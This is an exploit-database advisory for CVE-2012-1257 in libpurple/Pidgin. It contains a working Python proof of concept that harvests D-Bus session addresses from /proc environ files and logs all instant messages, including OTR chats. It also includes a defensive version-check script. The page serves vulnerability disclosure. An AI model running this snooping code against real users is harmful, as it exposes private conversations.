
libpurple 2.8.10 - OTR Information Disclosure

Published: 25 Feb 2012 00:00:00
Reported by: Dimitris Glynos
Type: exploitdb
Source: www.exploit-db.com

Related

Circl: CVE-2012-1257 (25 Feb 2012 00:00)
CVE: CVE-2012-1257 (20 Nov 2019 19:31)
Cvelist: CVE-2012-1257 (20 Nov 2019 19:31)
Debian CVE: CVE-2012-1257 (20 Nov 2019 19:31)
EUVD: EUVD-2012-1283 (7 Oct 2025 00:30)
exploitpack: libpurple 2.8.10 - OTR Information Disclosure (25 Feb 2012 00:00)
NVD: CVE-2012-1257 (20 Nov 2019 20:15)
OSV: DEBIAN-CVE-2012-1257 (20 Nov 2019 20:15)
OSV: UBUNTU-CVE-2012-1257 (20 Nov 2019 20:15)
Prion: Information disclosure (20 Nov 2019 20:15)

source: https://www.securityfocus.com/bid/52175/info

libpurple is prone to an information-disclosure vulnerability.

Successful exploits may allow attackers to obtain potentially sensitive information that may aid in other attacks.

The following products are vulnerable:

libpurple versions prior to 2.10.1
pidgin versions prior to 2.10.1
pidgin-otr versions prior to 3.2.0 

#!/usr/bin/env python
# PoC for snooping on pidgin discussions (OTR/non-OTR) via dbus
# (see CVE-2012-1257)
#
# requires python-dbus and python-gobject
#
# based on sample code found here:
# http://developer.pidgin.im/wiki/DbusHowto
#
# Disclaimer: There's virtually no error handling here,
# so don't rely on this for any serious work.
#
# Author:
# Dimitris Glynos :: { dimitris at census dash labs dot com }

import dbus, gobject, os, sys
from dbus.mainloop.glib import DBusGMainLoop

# same owner processes get to snoop their respective DBUS credentials
# via /proc/<pid>/environ

def obtain_dbus_session_creds():
	all_pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
	env_tmpl = '/proc/%s/environ'
	session_creds = {}

	for pid in all_pids:
		if not (os.stat(env_tmpl % pid).st_uid == os.getuid()):
			continue
		if not os.access(env_tmpl % pid, os.R_OK):
			continue

		f = open(env_tmpl % pid, 'rb')
		contents = f.read()
		f.close()
		for var in contents.split('\0'):
			if var.startswith('DBUS_SESSION_BUS_ADDRESS='):
				val = var[var.index('=')+1:]
				if not session_creds.has_key(val):
					session_creds[val] = 1
	return session_creds

def recvs(account, contact, msg, conversation, flags):
	print "received '%s' from %s" % (msg, contact)

def sends(account, contact, msg, conversation, flags):
	if flags == 1:
		print "sent '%s' to %s" % (msg, contact)

if not os.environ.has_key('DBUS_SESSION_BUS_ADDRESS'):
	creds = obtain_dbus_session_creds()

	if len(creds.keys()) == 0:
		print >> sys.stderr, ( "error: no dbus session " +
			"credentials could be recovered." )
		sys.exit(1)

	if len(creds.keys()) > 1:
		print >> sys.stderr, ( "error: multiple dbus session " +
			"credentials found!\nPlease rerun with the proper "+
			"DBUS_SESSION_BUS_ADDRESS env variable\n" +
			"Here are the recovered credentials:\n")
		for k in creds.keys():
			print >> sys.stderr, "DBUS_SESSION_BUS_ADDRESS=%s" % k
		sys.exit(1)

	os.environ["DBUS_SESSION_BUS_ADDRESS"] = creds.keys()[0]

dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SessionBus()

bus.add_signal_receiver(
	recvs,
	dbus_interface="im.pidgin.purple.PurpleInterface",
	signal_name="ReceivedImMsg"
)

bus.add_signal_receiver(
	sends,
	dbus_interface="im.pidgin.purple.PurpleInterface",
	signal_name="WroteImMsg"
)

mainloop = gobject.MainLoop()
mainloop.run()
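
A defender-side check of the affected-version list above, as an added example that is not part of the original advisory or PoC: it classifies an inventory of installed versions against the first non-vulnerable releases the advisory names. The `upstream_tuple` and `assess` helpers and the sample inventory are constructed for illustration.

```python
import re

# First non-vulnerable releases, from the advisory's "versions prior to" list.
FIXED = {
    "libpurple": (2, 10, 1),
    "pidgin": (2, 10, 1),
    "pidgin-otr": (3, 2, 0),
}

def upstream_tuple(version):
    """Return ((major, minor, patch, ...), is_prerelease) or None.
    Accepts distro-style strings: drops an epoch ("1:"), the packaging
    revision after the last "-", and "~"/"+" suffixes on the upstream part.
    """
    v = version.strip().split(":", 1)[-1]       # drop epoch
    upstream = v.rsplit("-", 1)[0]              # drop packaging revision
    prerelease = "~" in upstream                # "3.2.0~rc1" sorts before 3.2.0
    numeric = re.split(r"[~+]", upstream, maxsplit=1)[0]
    parts = numeric.split(".")
    if not all(p.isdigit() for p in parts):
        return None
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (3 - len(nums)), prerelease

def assess(inventory):
    """Map each (product, version) pair to 'vulnerable', 'fixed' or 'unknown'."""
    results = {}
    for product, version in inventory:
        fixed = FIXED.get(product)
        parsed = upstream_tuple(version)
        if fixed is None or parsed is None:
            results[product] = "unknown"        # not in advisory, or unparseable
            continue
        nums, prerelease = parsed
        older = nums < fixed or (nums == fixed and prerelease)
        results[product] = "vulnerable" if older else "fixed"
    return results

# Constructed sample inventory (not taken from any real host).
SAMPLE = [
    ("libpurple", "2.8.10"),
    ("pidgin", "1:2.10.1-1ubuntu2"),
    ("pidgin-otr", "3.2.0~rc1-1"),
    ("finch", "2.10.0"),
]

if __name__ == "__main__":
    for product, status in assess(SAMPLE).items():
        print(f"{product}: {status}")
```

Distribution packages can carry a backported fix under an older upstream version number, so confirm a "vulnerable" result against the distribution's own tracker entry for CVE-2012-1257.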


Vulners AI Score: 5.5 (Medium risk)
CVSS 2: 2.1
CVSS 3.1: 5.5
EPSS: 0.00243